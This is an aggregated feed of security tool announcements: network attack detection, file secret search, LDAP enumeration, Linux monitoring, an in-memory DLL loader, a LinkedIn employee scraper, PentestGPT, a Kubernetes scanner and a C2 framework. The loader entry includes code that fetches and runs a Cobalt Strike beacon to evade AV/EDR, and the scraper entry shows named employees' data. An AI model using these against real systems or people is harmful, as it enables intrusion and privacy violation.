FreshRSS

๐Ÿ”’
โŒ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayTools

Network_Assessment - With Wireshark Or TCPdump, You Can Determine Whether There Is Harmful Activity On Your Network Traffic That You Have Recorded On The Network You Monitor

By: Zion3R


With Wireshark or TCPdump, you can determine whether there is harmful activity on your network traffic that you have recorded on the network you monitor.

This Python script analyzes network traffic in a given .pcap file and attempts to detect the following suspicious network activities and attacks:

  1. DNS Tunneling
  2. SSH Tunneling
  3. TCP Session Hijacking
  4. SMB Attack
  5. SMTP or DNS Attack
  6. IPv6 Fragmentation Attack
  7. TCP RST Attack
  8. SYN Flood Attack
  9. UDP Flood Attack
  10. Slowloris Attack

The script also tries to detect packages containing suspicious keywords (eg "password", "login", "admin", etc.). Detected suspicious activities and attacks are displayed to the user in the console.

The main functions are:

  • get_user_input(): Gets the path of the .pcap file from the user.
  • get_all_ip_addresses(capture): Returns a set containing all source and destination IP addresses.
  • detect_* functions: Used to detect specific attacks and suspicious activities.
  • main(): Performs the main operations of the script. First, it gets the path of the .pcap file from the user, and then analyzes the file to try to detect the specified attacks and suspicious activity.

How to Install Script?

git clone https://github.com/alperenugurlu/Network_Assessment.git

pip3 install -r requirements.txt

How to Run the Script?

python3 Network_Compromise_Assessment.py

Please enter the path to the .pcap or .pcapng file: /root/Desktop/TCP_RST_Attack.pcap (Example)

Script Creator

Alperen Ugurlu

Social Media:

https://www.linkedin.com/in/alperen-ugurlu-7b57b7178/



Golddigger - Search Files For Gold

By: Zion3R


Gold Digger is a simple tool used to help quickly discover sensitive information in files recursively. Originally written to assist in rapidly searching files obtained during a penetration test.


Installation

Gold Digger requires Python3.

virtualenv -p python3 .
source bin/activate
python dig.py --help

Usage

Directory to search for gold -r RECURSIVE, --recursive RECURSIVE Search directory recursively? -l LOG, --log LOG Log file to save output" dir="auto">
usage: dig.py [-h] [-e EXCLUDE] [-g GOLD] -d DIRECTORY [-r RECURSIVE] [-l LOG]

optional arguments:
-h, --help show this help message and exit
-e EXCLUDE, --exclude EXCLUDE
JSON file containing extension exclusions
-g GOLD, --gold GOLD JSON file containing the gold to search for
-d DIRECTORY, --directory DIRECTORY
Directory to search for gold
-r RECURSIVE, --recursive RECURSIVE
Search directory recursively?
-l LOG, --log LOG Log file to save output

Example Usage

Gold Digger will recursively go through all folders and files in search of content matching items listed in the gold.json file. Additionally, you can leverage an exclusion file called exclusions.json for skipping files matching specific extensions. Provide the root folder as the --directory flag.

An example structure could be:

~/Engagements/CustomerName/data/randomfiles/
~/Engagements/CustomerName/data/randomfiles2/
~/Engagements/CustomerName/data/code/

You would provide the following command to parse all 3 account reports:

python dig.py --gold gold.json --exclude exclusions.json --directory ~/Engagements/CustomerName/data/ --log Customer_2022-123_gold.log

Results

The tool will create a log file containg the scanning results. Due to the nature of using regular expressions, there may be numerous false positives. Despite this, the tool has been proven to increase productivity when processing thousands of files.

Shout-outs

Shout out to @d1vious for releasing git-wild-hunt https://github.com/d1vious/git-wild-hunt! Most of the regex in GoldDigger was used from this amazing project.



msLDAPDump - LDAP Enumeration Tool

By: Zion3R


msLDAPDump simplifies LDAP enumeration in a domain environment by wrapping the lpap3 library from Python in an easy-to-use interface. Like most of my tools, this one works best on Windows. If using Unix, the tool will not resolve hostnames that are not accessible via eth0 currently.


Binding Anonymously

Users can bind to LDAP anonymously through the tool and dump basic information about LDAP, including domain naming context, domain controller hostnames, and more.

Credentialed Bind

Users can bind to LDAP utilizing valid user account credentials or a valid NTLM hash. Using credentials will obtain the same information as the anonymously binded request, as well as checking for the following:
  • Subnet scan for systems with ports 389 and 636 open
  • Basic Domain Info (Current user permissions, domain SID, password policy, machine account quota)
  • Users
  • Groups
  • Kerberoastable Accounts
  • ASREPRoastable Accounts
  • Constrained Delegation
  • Unconstrained Delegation
  • Computer Accounts - will also attempt DNS lookups on the hostname to identify IP addresses
  • Identify Domain Controllers
  • Identify Servers
  • Identify Deprecated Operating Systems
  • Identify MSSQL Servers
  • Identify Exchange Servers
  • Group Policy Objects (GPO)
  • Passwords in User description fields

Each check outputs the raw contents to a text file, and an abbreviated, cleaner version of the results in the terminal environment. The results in the terminal are pulled from the individual text files.

  • Add support for LDAPS (LDAP Secure)
  • NTLM Authentication
  • Figure out why Unix only allows one adapter to make a call out to the LDAP server (removed resolution from Linux until resolved)
  • Add support for querying child domain information (currently does not respond nicely to querying child domain controllers)
  • Figure out how to link the name to the Description field dump at the end of the script
  • mplement command line options rather than inputs
  • Check for deprecated operating systems in the domain

Mandatory Disclaimer

Please keep in mind that this tool is meant for ethical hacking and penetration testing purposes only. I do not condone any behavior that would include testing targets that you do not currently have permission to test against.



LSMS - Linux Security And Monitoring Scripts

By: Zion3R

These are a collection of security and monitoring scripts you can use to monitor your Linux installation for security-related events or for an investigation. Each script works on its own and is independent of other scripts. The scripts can be set up to either print out their results, send them to you via mail, or using AlertR as notification channel.


Repository Structure

The scripts are located in the directory scripts/. Each script contains a short summary in the header of the file with a description of what it is supposed to do, (if needed) dependencies that have to be installed and (if available) references to where the idea for this script stems from.

Each script has a configuration file in the scripts/config/ directory to configure it. If the configuration file was not found during the execution of the script, the script will fall back to default settings and print out the results. Hence, it is not necessary to provide a configuration file.

The scripts/lib/ directory contains code that is shared between different scripts.

Scripts using a monitor_ prefix hold a state and are only useful for monitoring purposes. A single usage of them for an investigation will only result in showing the current state the Linux system and not changes that might be relevant for the system's security. If you want to establish the current state of your system as benign for these scripts, you can provide the --init argument.

Usage

Take a look at the header of the script you want to execute. It contains a short description what this script is supposed to do and what requirements are needed (if any needed at all). If requirements are needed, install them before running the script.

The shared configuration file scripts/config/config.py contains settings that are used by all scripts. Furthermore, each script can be configured by using the corresponding configuration file in the scripts/config/ directory. If no configuration file was found, a default setting is used and the results are printed out.

Finally, you can run all configured scripts by executing start_search.py (which is located in the main directory) or by executing each script manually. A Python3 interpreter is needed to run the scripts.

Monitoring

If you want to use the scripts to monitor your Linux system constantly, you have to perform the following steps:

  1. Set up a notification channel that is supported by the scripts (currently printing out, mail, or AlertR).

  2. Configure the scripts that you want to run using the configuration files in the scripts/config/ directory.

  3. Execute start_search.py with the --init argument to initialize the scripts with the monitor_ prefix and let them establish a state of your system. However, this assumes that your system is currently uncompromised. If you are unsure of this, you should verify its current state.

  4. Set up a cron job as root user that executes start_search.py (e.g., 0 * * * * root /opt/LSMS/start_search.py to start the search hourly).

List of Scripts

Name Script
Monitoring cron files monitor_cron.py
Monitoring /etc/hosts file monitor_hosts_file.py
Monitoring /etc/ld.so.preload file monitor_ld_preload.py
Monitoring /etc/passwd file monitor_passwd.py
Monitoring modules monitor_modules.py
Monitoring SSH authorized_keys files monitor_ssh_authorized_keys.py
Monitoring systemd unit files monitor_systemd_units.py
Search executables in /dev/shm search_dev_shm.py
Search fileless programs (memfd_create) search_memfd_create.py
Search hidden ELF files search_hidden_exe.py
Search immutable files search_immutable_files.py
Search kernel thread impersonations search_non_kthreads.py
Search processes that were started by a now disconnected SSH session search_ssh_leftover_processes.py
Search running deleted programs search_deleted_exe.py
Test script to check if alerting works test_alert.py
Verify integrity of installed .deb packages verify_deb_packages.py


PythonMemoryModule - Pure-Python Implementation Of MemoryModule Technique To Load Dll And Unmanaged Exe Entirely From Memory

By: Zion3R


"Python memory module" AI generated pic - hotpot.ai


pure-python implementation of MemoryModule technique to load a dll or unmanaged exe entirely from memory

What is it

PythonMemoryModule is a Python ctypes porting of the MemoryModule technique originally published by Joachim Bauch. It can load a dll or unmanaged exe using Python without requiring the use of an external library (pyd). It leverages pefile to parse PE headers and ctypes.

The tool was originally thought to be used as a Pyramid module to provide evasion against AV/EDR by loading dll/exe payloads in python.exe entirely from memory, however other use-cases are possible (IP protection, pyds in-memory loading, spinoffs for other stealthier techniques) so I decided to create a dedicated repo.


Why it can be useful

  1. It basically allows to use the MemoryModule techinque entirely in Python interpreted language, enabling the loading of a dll from a memory buffer using the stock signed python.exe binary without requiring dropping on disk external code/libraries (such as pymemorymodule bindings) that can be flagged by AV/EDRs or can raise user's suspicion.
  2. Using MemoryModule technique in compiled languages loaders would require to embed MemoryModule code within the loaders themselves. This can be avoided using Python interpreted language and PythonMemoryModule since the code can be executed dynamically and in memory.
  3. you can get some level of Intellectual Property protection by dynamically in-memory downloading, decrypting and loading dlls that should be hidden from prying eyes. Bear in mind that the dlls can be still recovered from memory and reverse-engineered, but at least it would require some more effort by the attacker.
  4. you can load a stageless payload dll without performing injection or shellcode execution. The loading process mimics the LoadLibrary Windows API (which takes a path on disk as input) without actually calling it and operating in memory.

How to use it

In the following example a Cobalt Strike stageless beacon dll is downloaded (not saved on disk), loaded in memory and started by calling the entrypoint.

import urllib.request
import ctypes
import pythonmemorymodule
request = urllib.request.Request('http://192.168.1.2/beacon.dll')
result = urllib.request.urlopen(request)
buf=result.read()
dll = pythonmemorymodule.MemoryModule(data=buf, debug=True)
startDll = dll.get_proc_addr('StartW')
assert startDll()
#dll.free_library()

Note: if you use staging in your malleable profile the dll would not be able to load with LoadLibrary, hence MemoryModule won't work.

How to detect it

Using the MemoryModule technique will mostly respect the sections' permissions of the target DLL and avoid the noisy RWX approach. However within the program memory there will be a private commit not backed by a dll on disk and this is a MemoryModule telltale.

Future improvements

  1. add support for argument parsing.
  2. add support (basic) for .NET assemblies execution.


LinkedInDumper - Tool To Dump Company Employees From LinkedIn API

By: Zion3R

Python 3 script to dump company employees from LinkedIn API๏’ฌ

Description

LinkedInDumper is a Python 3 script that dumps employee data from the LinkedIn social networking platform.

The results contain firstname, lastname, position (title), location and a user's profile link. Only 2 API calls are required to retrieve all employees if the company does not have more than 10 employees. Otherwise, we have to paginate through the API results. With the --email-format CLI flag one can define a Python string format to auto generate email addresses based on the retrieved first and last name.


Requirements

LinkedInDumper talks with the unofficial LinkedIn Voyager API, which requires authentication. Therefore, you must have a valid LinkedIn user account. To keep it simple, LinkedInDumper just expects a cookie value provided by you. Doing it this way, even 2FA protected accounts are supported. Furthermore, you are tasked to provide a LinkedIn company URL to dump employees from.

Retrieving LinkedIn Cookie

  1. Sign into www.linkedin.com and retrieve your li_at session cookie value e.g. via developer tools
  2. Specify the cookie value either persistently in the python script's variable li_at or temporarily during runtime via the CLI flag --cookie

Retrieving LinkedIn Company URL

  1. Search your target company on Google Search or directly on LinkedIn
  2. The LinkedIn company URL should look something like this: https://www.linkedin.com/company/apple

Usage

usage: linkedindumper.py [-h] --url <linkedin-url> [--cookie <cookie>] [--quiet] [--include-private-profiles] [--email-format EMAIL_FORMAT]

options:
-h, --help show this help message and exit
--url <linkedin-url> A LinkedIn company url - https://www.linkedin.com/company/<company>
--cookie <cookie> LinkedIn 'li_at' session cookie
--quiet Show employee results only
--include-private-profiles
Show private accounts too
--email-format Python string format for emails; for example:
[1] john.doe@example.com > '{0}.{1}@example.com'
[2] j.doe@example.com > '{0[0]}.{1}@example.com'
[3] jdoe@example.com > '{0[0]}{1}@example.com'
[4] doe@example.com > '{1}@example.com'
[5] john@example.com > '{0}@example.com'
[6] jd@example.com > '{0[0]}{1[0]}@example.com'

Example 1 - Docker Run

docker run --rm l4rm4nd/linkedindumper:latest --url 'https://www.linkedin.com/company/apple' --cookie <cookie> --email-format '{0}.{1}@apple.de'

Example 2 - Native Python

# install dependencies
pip install -r requirements.txt

python3 linkedindumper.py --url 'https://www.linkedin.com/company/apple' --cookie <cookie> --email-format '{0}.{1}@apple.de'

Outputs

The script will return employee data as semi-colon separated values (like CSV):

 โ–ˆโ–ˆโ–“     โ–ˆโ–ˆโ–“ โ–ˆโ–ˆโ–ˆโ–„    โ–ˆ  โ–ˆโ–ˆ โ–„โ–ˆโ–€โ–“โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ โ–“โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–„  โ–ˆโ–ˆโ–“ โ–ˆโ–ˆโ–ˆโ–„    โ–ˆ โ–“โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–„  โ–ˆ    โ–ˆโ–ˆ  โ–ˆโ–ˆโ–ˆโ–„ โ–„โ–ˆโ–ˆโ–ˆโ–“ โ–ˆโ–ˆโ–“โ–ˆโ–ˆโ–ˆ  โ–“โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ  โ–ˆโ–ˆโ–€โ–ˆโ–ˆโ–ˆ  
โ–“โ–ˆโ–ˆโ–’ โ–“โ–ˆโ–ˆโ–’ โ–ˆโ–ˆ โ–€โ–ˆ โ–ˆ โ–ˆโ–ˆโ–„โ–ˆโ–’ โ–“โ–ˆ โ–€ โ–’โ–ˆโ–ˆโ–€ โ–ˆโ–ˆโ–Œโ–“โ–ˆโ–ˆโ–’ โ–ˆโ–ˆ โ–€โ–ˆ โ–ˆ โ–’โ–ˆโ–ˆโ–€ โ–ˆโ–ˆโ–Œ โ–ˆโ–ˆ โ–“โ–ˆโ–ˆโ–’โ–“โ–ˆโ–ˆโ–’โ–€โ–ˆ& #9600; โ–ˆโ–ˆโ–’โ–“โ–ˆโ–ˆโ–‘ โ–ˆโ–ˆโ–’โ–“โ–ˆ โ–€ โ–“โ–ˆโ–ˆ โ–’ โ–ˆโ–ˆโ–’
โ–’โ–ˆโ–ˆโ–‘ โ–’โ–ˆโ–ˆโ–’โ–“โ–ˆโ–ˆ โ–€โ–ˆ โ–ˆโ–ˆโ–’โ–“โ–ˆโ–ˆโ–ˆโ–„โ–‘ โ–’โ–ˆโ–ˆโ–ˆ โ–‘โ–ˆโ–ˆ โ–ˆโ–Œโ–’โ–ˆโ–ˆโ–’โ–“โ–ˆโ–ˆ โ–€โ–ˆ โ–ˆโ–ˆโ–’โ–‘โ–ˆโ–ˆ โ–ˆโ–Œโ–“โ–ˆโ–ˆ โ–’โ–ˆโ–ˆโ–‘โ–“โ–ˆโ–ˆ โ–“โ–ˆโ–ˆโ–‘โ–“โ–ˆโ–ˆโ–‘ โ–ˆโ–ˆโ–“โ–’โ–’โ–ˆโ–ˆโ–ˆ โ–“โ–ˆโ–ˆ โ–‘โ–„โ–ˆ โ–’
โ–’โ–ˆโ–ˆโ–‘ โ–‘โ–ˆโ–ˆโ–‘โ–“โ–ˆโ–ˆโ–’ โ–โ–Œโ–ˆโ–ˆโ–’โ–“โ–ˆโ–ˆ โ–ˆโ–„ โ–’โ–“โ–ˆ โ–„ โ–‘โ–“โ–ˆโ–„ โ–Œ&# 9617;โ–ˆโ–ˆโ–‘โ–“โ–ˆโ–ˆโ–’ โ–โ–Œโ–ˆโ–ˆโ–’โ–‘โ–“โ–ˆโ–„ โ–Œโ–“โ–“โ–ˆ โ–‘โ–ˆโ–ˆโ–‘โ–’โ–ˆโ–ˆ โ–’โ–ˆโ–ˆ โ–’โ–ˆโ–ˆโ–„โ–ˆโ–“โ–’ โ–’โ–’โ–“โ–ˆ โ–„ โ–’โ–ˆโ–ˆโ–€โ–€โ–ˆโ–„
โ–‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–’โ–‘โ–ˆโ–ˆโ–‘โ–’โ–ˆโ–ˆโ–‘ โ–“โ–ˆโ–ˆโ–‘โ–’โ–ˆโ–ˆโ–’ โ–ˆโ–„โ–‘โ–’โ–ˆโ–ˆโ–ˆโ–ˆโ–’โ–‘โ–’โ–ˆโ–ˆโ–ˆโ–ˆโ–“ โ–‘โ–ˆโ–ˆโ–‘โ–’โ–ˆโ–ˆโ–‘ โ–“โ–ˆโ–ˆโ–‘โ–‘โ–’โ–ˆโ–ˆโ–ˆโ–ˆโ–“ โ–’โ–’โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–“ โ–’โ–ˆโ–ˆโ–’ โ–‘โ–ˆโ–ˆโ–’โ–’โ–ˆโ–ˆโ–’ โ–‘ โ–‘โ–‘โ–’โ–ˆโ–ˆโ–ˆโ–ˆ& #9618;โ–‘โ–ˆโ–ˆโ–“ โ–’โ–ˆโ–ˆโ–’
โ–‘ โ–’โ–‘โ–“ โ–‘โ–‘โ–“ โ–‘ โ–’โ–‘ โ–’ โ–’ โ–’ โ–’โ–’ โ–“โ–’โ–‘โ–‘ โ–’โ–‘ โ–‘ โ–’โ–’โ–“ โ–’ โ–‘โ–“ โ–‘ โ–’โ–‘ โ–’ โ–’ โ–’โ–’โ–“ โ–’ โ–‘โ–’โ–“โ–’ โ–’ โ–’ โ–‘ โ–’โ–‘ โ–‘ โ–‘โ–’โ–“โ–’โ–‘ โ–‘ โ–‘โ–‘โ–‘ โ–’โ–‘ โ–‘โ–‘ โ–’โ–“ โ–‘โ–’โ–“โ–‘
โ–‘ โ–‘ โ–’ โ–‘ โ–’ โ–‘โ–‘ โ–‘โ–‘ โ–‘ โ–’โ–‘โ–‘ โ–‘โ–’ โ–’โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–’ โ–’ โ–’ โ–‘โ–‘ โ–‘โ–‘ โ–‘ โ–’โ–‘ โ–‘ โ–’ โ–’ โ–‘โ–‘โ–’โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘โ–‘โ–’ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘โ–’ โ–‘ โ–’โ–‘
โ–‘ โ–‘ โ–’ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–’ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘โ–‘โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘โ–‘ โ–‘ โ–‘โ–‘ โ–‘
โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘
โ–‘ โ–‘ โ–‘ by LRVT

[i] Company Name: apple
[i] Company X-ID: 162479
[i] LN Employees: 1000 employees found
[i] Dumping Date: 17/10/2022 13:55:06
[i] Email Format: {0}.{1}@apple.de
Firstname;Lastname;Email;Position;Gender;Location;Profile
Katrin;Honauer;katrin.honauer@apple.com;Software Engineer at Apple;N/A;Heidelberg;https://www.linkedin.com/in/katrin-honauer
Raymond;Chen;raymond.chen@apple.com;Recruiting at Apple;N/A;Austin, Texas Metropolitan Area;https://www.linkedin.com/in/raytherecruiter

[i] Successfully crawled 2 unique apple employee(s). Hurray ^_-

Limitations

LinkedIn will allow only the first 1,000 search results to be returned when harvesting contact information. You may also need a LinkedIn premium account when you reached the maximum allowed queries for visiting profiles with your freemium LinkedIn account.

Furthermore, not all employee profiles are public. The results vary depending on your used LinkedIn account and whether you are befriended with some employees of the company to crawl or not. Therefore, it is sometimes not possible to retrieve the firstname, lastname and profile url of some employee accounts. The script will not display such profiles, as they contain default values such as "LinkedIn" as firstname and "Member" in the lastname. If you want to include such private profiles, please use the CLI flag --include-private-profiles. Although some accounts may be private, we can obtain the position (title) as well as the location of such accounts. Only firstname, lastname and profile URL are hidden for private LinkedIn accounts.

Finally, LinkedIn users are free to name their profile. An account name can therefore consist of various things such as saluations, abbreviations, emojis, middle names etc. I tried my best to remove some nonsense. However, this is not a complete solution to the general problem. Note that we are not using the official LinkedIn API. This script gathers information from the "unofficial" Voyager API.



PentestGPT - A GPT-empowered Penetration Testing Tool

By: Zion3R


A GPT-empowered penetration testing tool.

Common Questions

  • Q: What is PentestGPT?
    • A: PentestGPT is a penetration testing tool empowered by ChatGPT. It is designed to automate the penetration testing process. It is built on top of ChatGPT and operate in an interactive mode to guide penetration testers in both overall progress and specific operations.
  • Q: Do I need to be a ChatGPT plus member to use PentestGPT?
    • A: Yes. PentestGPT relies on GPT-4 model for high-quality reasoning. Since there is no public GPT-4 API yet, a wrapper is included to use ChatGPT session to support PentestGPT. You may also use GPT-4 API directly if you have access to it.
  • Q: Why GPT-4?
    • A: After empirical evaluation, we found that GPT-4 performs better than GPT-3.5 in terms of penetration testing reasoning. In fact, GPT-3.5 leads to failed test in simple tasks.
  • Q: Why not just use GPT-4 directly?
    • A: We found that GPT-4 suffers from losses of context as test goes deeper. It is essential to maintain a "test status awareness" in this process. You may check the PentestGPT design here for more details.
  • Q: What about AutoGPT?
    • A: AutoGPT is not designed for pentest. It may perform malicious operations. Due to this consideration, we design PentestGPT in an interactive mode. Of course, our end goal is an automated pentest solution.
  • Q: Future plan?
    • A: We're working on a paper to explore the tech details behind automated pentest. Meanwhile, please feel free to raise issues/discussions. I'll do my best to address all of them.

Getting Started

  • PentestGPT is a penetration testing tool empowered by ChatGPT.
  • It is designed to automate the penetration testing process. It is built on top of ChatGPT and operate in an interactive mode to guide penetration testers in both overall progress and specific operations.
  • PentestGPT is able to solve easy to medium HackTheBox machines, and other CTF challenges. You can check this example in resources where we use it to solve HackTheBox challenge TEMPLATED (web challenge).
  • A sample testing process of PentestGPT on a target VulnHub machine (Hackable II) is available at here.
  • A sample usage video is below: (or available here: Demo)

Installation

Before installation, we recommend you to take a look at this installation video if you want to use cookie setup.

  1. Install requirements.txt with pip install -r requirements.txt
  2. Configure the cookies in config. You may follow a sample by cp config/chatgpt_config_sample.py config/chatgpt_config.py.
    • If you're using cookie, please watch this video: https://youtu.be/IbUcj0F9EBc. The general steps are:
      • Login to ChatGPT session page.
      • In Inspect - Network, find the connections to the ChatGPT session page.
      • Find the cookie in the request header in the request to https://chat.openai.com/api/auth/session and paste it into the cookie field of config/chatgpt_config.py. (You may use Inspect->Network, find session and copy the cookie field in request_headers to https://chat.openai.com/api/auth/session)
      • Note that the other fields are temporarily deprecated due to the update of ChatGPT page.
      • Fill in userAgent with your user agent.
    • If you're using API:
      • Fill in the OpenAI API key in chatgpt_config.py.
  3. To verify that the connection is configured properly, you may run python3 test_connection.py. You should see some sample conversation with ChatGPT.
    • A sample output is below
    1. You're connected with ChatGPT Plus cookie. 
    To start PentestGPT, please use <python3 main.py --reasoning_model=gpt-4>
    ## Test connection for OpenAI api (GPT-4)
    2. You're connected with OpenAI API. You have GPT-4 access. To start PentestGPT, please use <python3 main.py --reasoning_model=gpt-4 --useAPI>
    ## Test connection for OpenAI api (GPT-3.5)
    3. You're connected with OpenAI API. You have GPT-3.5 access. To start PentestGPT, please use <python3 main.py --reasoning_model=gpt-3.5-turbo --useAPI>
  4. (Notice) The above verification process for cookie. If you encounter errors after several trials, please try to refresh the page, repeat the above steps, and try again. You may also try with the cookie to https://chat.openai.com/backend-api/conversations. Please submit an issue if you encounter any problem.

Usage

  1. To start, run python3 main.py --args.
    • --reasoning_model is the reasoning model you want to use.
    • --useAPI is whether you want to use OpenAI API.
    • You're recommended to use the combination as suggested by test_connection.py, which are:
      • python3 main.py --reasoning_model=gpt-4
      • python3 main.py --reasoning_model=gpt-4 --useAPI
      • python3 main.py --reasoning_model=gpt-3.5-turbo --useAPI
  2. The tool works similar to msfconsole. Follow the guidance to perform penetration testing.
  3. In general, PentestGPT intakes commands similar to chatGPT. There are several basic commands.
    1. The commands are:
      • help: show the help message.
      • next: key in the test execution result and get the next step.
      • more: let PentestGPT to explain more details of the current step. Also, a new sub-task solver will be created to guide the tester.
      • todo: show the todo list.
      • discuss: discuss with the PentestGPT.
      • google: search on Google. This function is still under development.
      • quit: exit the tool and save the output as log file (see the reporting section below).
    2. You can use <SHIFT + right arrow> to end your input (and is for next line).
    3. You may always use TAB to autocomplete the commands.
    4. When you're given a drop-down selection list, you can use cursor or arrow key to navigate the list. Press ENTER to select the item. Similarly, use <SHIFT + right arrow> to confirm selection.
  4. In the sub-task handler initiated by more, users can execute more commands to investigate into a specific problem:
    1. The commands are:
      • help: show the help message.
      • brainstorm: let PentestGPT brainstorm on the local task for all the possible solutions.
      • discuss: discuss with PentestGPT about this local task.
      • google: search on Google. This function is still under development.
      • continue: exit the subtask and continue the main testing session.

Report and Logging

  1. After finishing the penetration testing, a report will be automatically generated in logs folder (if you quit with quit command).
  2. The report can be printed in a human-readable format by running python3 utils/report_generator.py <log file>. A sample report sample_pentestGPT_log.txt is also uploaded.

Contributing

Contributions are what make the open source community such an amazing place to learn, inspire, and create. Any contributions you make are greatly appreciated.

If you have a suggestion that would make this better, please fork the repo and create a pull request. You can also simply open an issue with the tag "enhancement". Don't forget to give the project a star! Thanks again!

  1. Fork the Project
  2. Create your Feature Branch (git checkout -b feature/AmazingFeature)
  3. Commit your Changes (git commit -m 'Add some AmazingFeature')
  4. Push to the Branch (git push origin feature/AmazingFeature)
  5. Open a Pull Request

License

Distributed under the MIT License. See LICENSE.txt for more information.

Contact

Gelei Deng - gelei.deng@ntu.edu.sg



KubeStalk - Discovers Kubernetes And Related Infrastructure Based Attack Surface From A Black-Box Perspective

ย 


KubeStalk is a tool to discover Kubernetes and related infrastructure based attack surface from a black-box perspective. This tool is a community version of the tool used to probe for unsecured Kubernetes clusters around the internet during Project Resonance - Wave 9.


Usage

The GIF below demonstrates usage of the tool:


Installation

KubeStalk is written in Python and requires the requests library.

To install the tool, you can clone the repository to any directory:

git clone https://github.com/redhuntlabs/kubestalk

Once cloned, you need to install the requests library using python3 -m pip install requests or:

python3 -m pip install -r requirements.txt

Everything is setup and you can use the tool directly.

Command-line Arguments

A list of command line arguments supported by the tool can be displayed using the -h flag.

$ python3 kubestalk.py  -h

+---------------------+
| K U B E S T A L K |
+---------------------+ v0.1

[!] KubeStalk by RedHunt Labs - A Modern Attack Surface (ASM) Management Company
[!] Author: 0xInfection (RHL Research Team)
[!] Continuously Track Your Attack Surface using https://redhuntlabs.com/nvadr.

usage: ./kubestalk.py <url(s)>/<cidr>

Required Arguments:
urls List of hosts to scan

Optional Arguments:
-o OUTPUT, --output OUTPUT
Output path to write the CSV file to
-f SIG_FILE, --sig-dir SIG_FILE
Signature directory path to load
-t TIMEOUT, --timeout TIMEOUT
HTTP timeout value in seconds
-ua USER_AGENT, --user-agent USER_AGENT
User agent header t o set in HTTP requests
--concurrency CONCURRENCY
No. of hosts to process simultaneously
--verify-ssl Verify SSL certificates
--version Display the version of KubeStalk and exit.

Basic Usage

To use the tool, you can pass one or more hosts to the script. All targets passed to the tool must be RFC 3986 complaint, i.e. must contain a scheme and hostname (and port if required).

A basic usage is as below:

$ python3 kubestalk.py https://โ–ˆโ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆโ–ˆโ–ˆ:10250

+---------------------+
| K U B E S T A L K |
+---------------------+ v0.1

[!] KubeStalk by RedHunt Labs - A Modern Attack Surface (ASM) Management Company
[!] Author: 0xInfection (RHL Research Team)
[!] Continuously Track Your Attack Surface using https://redhuntlabs.com/nvadr.

[+] Loaded 10 signatures to scan.
[*] Processing host: https://โ–ˆโ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆโ–ˆ:10250
[!] Found potential issue on https://โ–ˆโ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆโ–ˆ:10250: Kubernetes Pod List Exposure
[*] Writing results to output file.
[+] Done.

HTTP Tuning

HTTP requests can be fine-tuned using the -t (to mention HTTP timeouts), -ua (to specify custom user agents) and the --verify-ssl (to validate SSL certificates while making requests).

Concurrency

You can control the number of hosts to scan simultanously using the --concurrency flag. The default value is set to 5.

Output

The output is written to a CSV filea and can be controlled by the --output flag.

A sample of the CSV output rendered in markdown is as belows:

host path issue type severity
https://โ–ˆ.โ–ˆ.โ–ˆ.โ–ˆ:10250 /pods Kubernetes Pod List Exposure core-component vulnerability/misconfiguration
https://โ–ˆ.โ–ˆ.โ–ˆ.โ–ˆ:443 /api/v1/pods Kubernetes Pod List Exposure core-component vulnerability/misconfiguration
http://โ–ˆ.โ–ˆ.โ–ˆโ–ˆ.โ–ˆ:80 / etcd Viewer Dashboard Exposure add-on vulnerability/exposure
http://โ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆ.โ–ˆ:80 / cAdvisor Metrics Web UI Dashboard Exposure add-on vulnerability/exposure

Version & License

The tool is licensed under the BSD 3 Clause License and is currently at v0.1.

To know more about our Attack Surface Management platform, check out NVADR.



Striker - A Command And Control (C2)


Striker is a simple Command and Control (C2) program.


Disclaimer

This project is under active development. Most of the features are experimental, with more to come. Expect breaking changes.

Features

A) Agents

  • Native agents for linux and windows hosts.
  • Self-contained, minimal python agent should you ever need it.
  • HTTP(s) channels.
  • Aynchronous tasks execution.
  • Support for multiple redirectors, and can fallback to others when active one goes down.

B) Backend / Teamserver

  • Supports multiple operators.
  • Most features exposed through the REST API, making it easy to automate things.
  • Uses web sockets for faster comms.

C) User Interface

  • Smooth and reactive UI thanks to Svelte and SocketIO.
  • Easy to configure as it compiles into static HTML, JavaScript, and CSS files, which can be hosted with even the most basic web server you can find.
  • Teamchat feature to communicate with other operators over text.

Installing Striker

Clone the repo;

$ git clone https://github.com/4g3nt47/Striker.git
$ cd Striker

The codebase is divided into 4 independent sections;

1. The C2 Server / Backend

This handles all server-side logic for both operators and agents. It is a NodeJS application made with;

  • express - For the REST API.
  • socket.io - For Web Socket communtication.
  • mongoose - For connecting to MongoDB.
  • multer - For handling file uploads.
  • bcrypt - For hashing user passwords.

The source code is in the backend/ directory. To setup the server;

  1. Setup a MongoDB database;

Striker uses MongoDB as backend database to store all important data. You can install this locally on your machine using this guide for debian-based distros, or create a free one with MongoDB Atlas (A database-as-a-service platform).

  1. Move into the source directory;
$ cd backend
  1. Install dependencies;
$ npm install
  1. Create a directory for static files;
$ mkdir static

You can use this folder to host static files on the server. This should also be where your UPLOAD_LOCATION is set to in the .env file (more on this later), but this is not necessary. Files in this directory will be publicly accessible under the path /static/.

  1. Create a .env file;

NOTE: Values between < and > are placeholders. Replace them with appropriate values (including the <>). For fields that require random strings, you can generate them easily using;

$ head -c 100 /dev/urandom | sha256sum
